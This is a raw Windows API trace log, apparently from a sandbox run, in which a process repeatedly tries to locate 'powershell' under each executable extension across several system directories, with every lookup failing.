	[0689.764] SetErrorMode (uMode=0x1) returned 0x1
	[0689.765] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0689.767] SetErrorMode (uMode=0x1) returned 0x1
	[0689.767] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0689.778] SetErrorMode (uMode=0x1) returned 0x1
	[0689.782] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0689.782] SetErrorMode (uMode=0x1) returned 0x1
	[0689.783] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0691.744] SetErrorMode (uMode=0x1) returned 0x1
	[0691.745] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0691.745] SetErrorMode (uMode=0x1) returned 0x1
	[0691.745] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0691.754] SetErrorMode (uMode=0x1) returned 0x1
	[0691.755] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0691.755] SetErrorMode (uMode=0x1) returned 0x1
	[0691.755] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0691.763] SetErrorMode (uMode=0x1) returned 0x1
	[0691.765] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0691.765] SetErrorMode (uMode=0x1) returned 0x1
	[0691.765] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0691.773] SetErrorMode (uMode=0x1) returned 0x1
	[0691.775] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0691.775] SetErrorMode (uMode=0x1) returned 0x1
	[0691.775] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0691.783] SetErrorMode (uMode=0x1) returned 0x1
	[0691.784] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0691.785] SetErrorMode (uMode=0x1) returned 0x1
	[0691.785] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.525] SetErrorMode (uMode=0x1) returned 0x1
	[0693.526] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0693.527] SetErrorMode (uMode=0x1) returned 0x1
	[0693.527] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.536] SetErrorMode (uMode=0x1) returned 0x1
	[0693.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.538] SetErrorMode (uMode=0x1) returned 0x1
	[0693.538] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.538] SetErrorMode (uMode=0x1) returned 0x1
	[0693.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.539] SetErrorMode (uMode=0x1) returned 0x1
	[0693.539] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.539] SetErrorMode (uMode=0x1) returned 0x1
	[0693.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.540] SetErrorMode (uMode=0x1) returned 0x1
	[0693.540] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.540] SetErrorMode (uMode=0x1) returned 0x1
	[0693.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.540] SetErrorMode (uMode=0x1) returned 0x1
	[0693.540] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.541] SetErrorMode (uMode=0x1) returned 0x1
	[0693.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.541] SetErrorMode (uMode=0x1) returned 0x1
	[0693.541] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.541] SetErrorMode (uMode=0x1) returned 0x1
	[0693.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.542] SetErrorMode (uMode=0x1) returned 0x1
	[0693.542] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.542] SetErrorMode (uMode=0x1) returned 0x1
	[0693.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.543] SetErrorMode (uMode=0x1) returned 0x1
	[0693.543] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.543] SetErrorMode (uMode=0x1) returned 0x1
	[0693.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.543] SetErrorMode (uMode=0x1) returned 0x1
	[0693.543] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.544] SetErrorMode (uMode=0x1) returned 0x1
	[0693.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.544] SetErrorMode (uMode=0x1) returned 0x1
	[0693.544] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.544] SetErrorMode (uMode=0x1) returned 0x1
	[0693.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.545] SetErrorMode (uMode=0x1) returned 0x1
	[0693.545] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.545] SetErrorMode (uMode=0x1) returned 0x1
	[0693.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.545] SetErrorMode (uMode=0x1) returned 0x1
	[0693.546] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.546] SetErrorMode (uMode=0x1) returned 0x1
	[0693.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.546] SetErrorMode (uMode=0x1) returned 0x1
	[0693.546] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.547] SetErrorMode (uMode=0x1) returned 0x1
	[0693.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.547] SetErrorMode (uMode=0x1) returned 0x1
	[0693.547] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.547] SetErrorMode (uMode=0x1) returned 0x1
	[0693.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.557] SetErrorMode (uMode=0x1) returned 0x1
	[0693.557] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.557] SetErrorMode (uMode=0x1) returned 0x1
	[0693.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.557] SetErrorMode (uMode=0x1) returned 0x1
	[0693.558] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.558] SetErrorMode (uMode=0x1) returned 0x1
	[0693.558] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0693.558] SetErrorMode (uMode=0x1) returned 0x1
	[0693.558] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.559] SetErrorMode (uMode=0x1) returned 0x1
	[0693.559] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0693.559] SetErrorMode (uMode=0x1) returned 0x1
	[0693.559] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.559] SetErrorMode (uMode=0x1) returned 0x1
	[0693.559] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0693.560] SetErrorMode (uMode=0x1) returned 0x1
	[0693.560] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.560] SetErrorMode (uMode=0x1) returned 0x1
	[0693.560] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0693.560] SetErrorMode (uMode=0x1) returned 0x1
	[0693.561] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.561] SetErrorMode (uMode=0x1) returned 0x1
	[0693.561] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0693.561] SetErrorMode (uMode=0x1) returned 0x1
	[0693.561] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.562] SetErrorMode (uMode=0x1) returned 0x1
	[0693.562] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0693.562] SetErrorMode (uMode=0x1) returned 0x1
	[0693.562] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.562] SetErrorMode (uMode=0x1) returned 0x1
	[0693.562] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0693.563] SetErrorMode (uMode=0x1) returned 0x1
